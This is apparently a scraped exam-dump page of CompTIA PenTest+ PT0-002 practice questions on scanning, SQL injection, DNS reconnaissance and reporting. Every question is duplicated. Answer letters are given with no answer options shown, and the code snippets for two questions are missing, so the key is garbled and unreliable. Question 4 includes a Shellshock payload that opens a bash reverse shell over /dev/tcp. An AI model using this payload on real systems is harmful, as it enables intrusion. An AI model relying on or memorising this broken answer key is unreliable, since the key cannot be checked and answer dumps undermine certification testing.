최신CompTIA PenTest+ Certification - PT0-002무료샘플문제
문제1
During a client engagement, a penetration tester runs the following Nmap command and obtains the following output:
nmap -sV -- script ssl-enum-ciphers -p 443 remotehost
| TLS_ECDHE_ECDSA_WITH_RC4_128_SHA
| TLS_ECDHE_RSA_WITH_RC4_128_SHA
TLS_RSA_WITH_RC4_128_SHA (rsa 2048)
TLS_RSA_WITH_RC4_128_MD5 (rsa 2048)
Which of the following should the penetration tester include in the report?
During a client engagement, a penetration tester runs the following Nmap command and obtains the following output:
nmap -sV -- script ssl-enum-ciphers -p 443 remotehost
| TLS_ECDHE_ECDSA_WITH_RC4_128_SHA
| TLS_ECDHE_RSA_WITH_RC4_128_SHA
TLS_RSA_WITH_RC4_128_SHA (rsa 2048)
TLS_RSA_WITH_RC4_128_MD5 (rsa 2048)
Which of the following should the penetration tester include in the report?
정답: A
설명: (KoreaDumps 회원만 볼 수 있음)
문제2
Which of the following is the most secure way to protect a final report file when delivering the report to the client/customer?
Which of the following is the most secure way to protect a final report file when delivering the report to the client/customer?
정답: B
설명: (KoreaDumps 회원만 볼 수 있음)
문제3
A penetration tester wants to perform a SQL injection test. Which of the following characters should the tester use to start the SQL injection attempt?
A penetration tester wants to perform a SQL injection test. Which of the following characters should the tester use to start the SQL injection attempt?
정답: A
설명: (KoreaDumps 회원만 볼 수 있음)
문제4
A penetration tester discovers a vulnerable web server at 10.10.1.1. The tester then edits a Python script that sends a web exploit and comes across the following code:
exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& /dev/tcp/127.0.0.1/9090 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"}
Which of the following edits should the tester make to the script to determine the user context in which the server is being run?
A penetration tester discovers a vulnerable web server at 10.10.1.1. The tester then edits a Python script that sends a web exploit and comes across the following code:
exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& /dev/tcp/127.0.0.1/9090 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"}
Which of the following edits should the tester make to the script to determine the user context in which the server is being run?
정답: D
문제5
Which of the following can be used to store alphanumeric data that can be fed into scripts or programs as input to penetration-testing tools?
Which of the following can be used to store alphanumeric data that can be fed into scripts or programs as input to penetration-testing tools?
정답: D
설명: (KoreaDumps 회원만 볼 수 있음)
문제6
A penetration tester ran a simple Python-based scanner. The following is a snippet of the code:
Which of the following BEST describes why this script triggered a `probable port scan` alert in the organization's IDS?
A penetration tester ran a simple Python-based scanner. The following is a snippet of the code:
Which of the following BEST describes why this script triggered a `probable port scan` alert in the organization's IDS?
정답: D
설명: (KoreaDumps 회원만 볼 수 있음)
문제7
A penetration tester is testing a new version of a mobile application in a sandbox environment. To intercept and decrypt the traffic between the application and the external API, the tester has created a private root CA and issued a certificate from it. Even though the tester installed the root CA into the trusted stone of the smartphone used for the tests, the application shows an error indicating a certificate mismatch and does not connect to the server. Which of the following is the
MOST likely reason for the error?
A penetration tester is testing a new version of a mobile application in a sandbox environment. To intercept and decrypt the traffic between the application and the external API, the tester has created a private root CA and issued a certificate from it. Even though the tester installed the root CA into the trusted stone of the smartphone used for the tests, the application shows an error indicating a certificate mismatch and does not connect to the server. Which of the following is the
MOST likely reason for the error?
정답: A
문제8
A penetration tester created the following script to use in an engagement:
However, the tester is receiving the following error when trying to run the script:
Which of the following is the reason for the error?
A penetration tester created the following script to use in an engagement:
However, the tester is receiving the following error when trying to run the script:
Which of the following is the reason for the error?
정답: A
설명: (KoreaDumps 회원만 볼 수 있음)
문제9
An organization is using Android mobile devices but does not use MDM services. Which of the following describes an existing risk present in this scenario?
An organization is using Android mobile devices but does not use MDM services. Which of the following describes an existing risk present in this scenario?
정답: D
설명: (KoreaDumps 회원만 볼 수 있음)
문제10
When preparing for an engagement with an enterprise organization, which of the following is one of the MOST important items to develop fully prior to beginning the penetration testing activities?
When preparing for an engagement with an enterprise organization, which of the following is one of the MOST important items to develop fully prior to beginning the penetration testing activities?
정답: B
설명: (KoreaDumps 회원만 볼 수 있음)
문제11
Which of the following types of information would most likely be included in an application security assessment report addressed to developers? (Select two).
Which of the following types of information would most likely be included in an application security assessment report addressed to developers? (Select two).
정답: A,F
설명: (KoreaDumps 회원만 볼 수 있음)
문제12
A vulnerability assessor is looking to establish a baseline of all IPv4 network traffic on the local VLAN without a local IP address. Which of the following Nmap command sequences would best provide this information?
A vulnerability assessor is looking to establish a baseline of all IPv4 network traffic on the local VLAN without a local IP address. Which of the following Nmap command sequences would best provide this information?
정답: D
설명: (KoreaDumps 회원만 볼 수 있음)
문제13
A penetration tester is performing DNS reconnaissance and has obtained the following output using different dig comrr
;; ANSWER SECTION
company.com. 5 IN MX 10 mxa.company.com
company.com. 5 IN- MX 10 mxb.company.com
company.com. 5 IN MX 100 mxc.company.com
;; ANSWER SECTION company.com. 5 IN A 120.73.220.53
;; ANSWER SECTION company.com. 5 IN NS nsl.nsvr.com
Which of the following can be concluded from the output the penetration tester obtained?
A penetration tester is performing DNS reconnaissance and has obtained the following output using different dig comrr
;; ANSWER SECTION
company.com. 5 IN MX 10 mxa.company.com
company.com. 5 IN- MX 10 mxb.company.com
company.com. 5 IN MX 100 mxc.company.com
;; ANSWER SECTION company.com. 5 IN A 120.73.220.53
;; ANSWER SECTION company.com. 5 IN NS nsl.nsvr.com
Which of the following can be concluded from the output the penetration tester obtained?
정답: B
설명: (KoreaDumps 회원만 볼 수 있음)